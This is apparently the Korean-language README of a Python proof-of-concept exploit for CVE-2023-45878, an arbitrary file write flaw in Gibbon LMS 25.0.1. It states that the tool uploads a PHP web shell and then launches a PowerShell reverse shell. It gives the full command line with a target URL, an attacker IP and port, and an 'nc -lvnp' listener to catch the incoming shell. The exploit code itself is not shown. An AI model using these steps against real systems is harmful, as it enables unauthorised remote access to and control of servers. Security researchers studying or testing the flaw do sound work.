
Gibbon LMS 25.0.1을 대상으로 하는 CVE-2023-45878 Python 익스플로잇입니다. 임의 파일 쓰기를 사용하여 PHP 웹 셸을 업로드하고 PowerShell 리버스 셸을 실행하여 원격 액세스를 얻습니다.
이 스크립트는 https://herolab.usd.de/security-advisories/usd-2023-0025/ 의 연구 결과를 기반으로 작성했습니다. 이 익스플로잇은 Gibbon LMS 25.0.1의 임의 파일 쓰기(Arbitrary File Write) 취약점을 이용합니다. 이 PoC는 간단한 php 명령 스크립트를 업로드한 다음 이를 사용하여 PowerShell 리버스 셸을 로드합니다.
python3 CVE-2023-45878.py -u http://target.com/Gibbon-LMS -l 10.10.16.2 -p 8888 -f asdf
플래그:
-u, URL where Gibbon LMS is installed.
-l, your IP
-p, your open port
-f, filename. Important if you need to manually test. Default is "asdf".
들어오는 셸을 받을 리스너를 준비하세요.
nc -lvnp 8888